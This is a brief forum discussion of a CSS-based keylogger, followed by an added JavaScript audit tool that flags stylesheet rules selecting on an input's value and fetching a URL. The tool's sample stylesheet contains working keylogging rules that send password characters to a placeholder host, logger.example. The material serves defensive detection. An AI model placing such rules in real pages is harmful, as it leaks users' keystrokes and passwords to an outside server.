by Francute 3043 days ago
Not an efficient keylogger; however, if you know the pressed keys, you can just generate permutations ordered using probabilities, and that would be a lot faster than brute force.

The real deal here is, it depends on some js code updating the dom for each key press, which is BAAAD. Not a useless keylogger, because it reminds us of a vulnerability that is the product of a bad decision.

2 comments

Interestingly the password "BAAAD" would generate 3 requests to the logging server, since it wouldn't request the background image for the letter "A" more than one time. Or shouldn't, anyway.

That depends on cache headers sent from the server, which the attacker controls.

> it depends on some js code updating the dom for each key press

Like React with JSX?

It may be easier to XSS CSS than JS.
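
An added example, not written by any commenter in this thread: a defender-side audit that flags stylesheet rules which select on an input's `value` attribute and also fetch a URL, the combination that turns a DOM-mirrored keystroke into a background-image request. The rule shape, the function names (`auditCss`, `isCrossOrigin`), the sample stylesheet and the hosts `logger.example` and `app.example` are assumptions made for illustration.

```javascript
// Added example. SAMPLE_CSS is constructed; logger.example and app.example
// are placeholder hosts. Simple regex scan, not a full CSS parser.
const SAMPLE_CSS = `
input[type="password"][value$="a"] { background-image: url("https://logger.example/a"); }
input[type="password"][value$="b"] { background-image: url("https://logger.example/b"); }
input[type="text"][value=""] { border-color: red; }
.hero { background: url("/static/hero.png"); }
/* input[value$="z"] { background: url("https://logger.example/z"); } */
`;

// Attribute selector on `value` with any operator: =, ^=, $=, *=, ~=, |=
const VALUE_SELECTOR =
  /\[\s*value\s*([~|^$*]?=)\s*(?:"[^"]*"|'[^']*'|[^\]\s]*)\s*(?:[is]\s*)?\]/gi;
const URL_FN = /url\(\s*(?:"([^"]*)"|'([^']*)'|([^)\s]*))\s*\)/gi;

function isCrossOrigin(url, pageOrigin) {
  try {
    return new URL(url, pageOrigin).origin !== new URL(pageOrigin).origin;
  } catch {
    return true; // unparseable target: treat as suspicious
  }
}

// Returns one finding per rule that both selects on `value` and fetches a URL.
function auditCss(cssText, pageOrigin) {
  const css = cssText.replace(/\/\*[\s\S]*?\*\//g, ""); // strip comments
  const findings = [];
  for (const [, rawSelector, body] of css.matchAll(/([^{}]+)\{([^{}]*)\}/g)) {
    const selector = rawSelector.trim();
    const operators = [...selector.matchAll(VALUE_SELECTOR)].map(m => m[1]);
    const urls = [...body.matchAll(URL_FN)].map(m => m[1] ?? m[2] ?? m[3]);
    if (operators.length === 0 || urls.length === 0) continue;
    findings.push({
      selector,
      operators,
      urls,
      crossOrigin: urls.some(u => isCrossOrigin(u, pageOrigin)),
    });
  }
  return findings;
}

for (const f of auditCss(SAMPLE_CSS, "https://app.example")) {
  console.log(f.crossOrigin ? "HIGH" : "REVIEW", f.selector, "->", f.urls.join(", "));
}
```

A hit in a third-party or user-supplied stylesheet is the case to escalate. A restrictive `style-src` and `img-src` Content Security Policy limits where such rules can come from and where they can send requests.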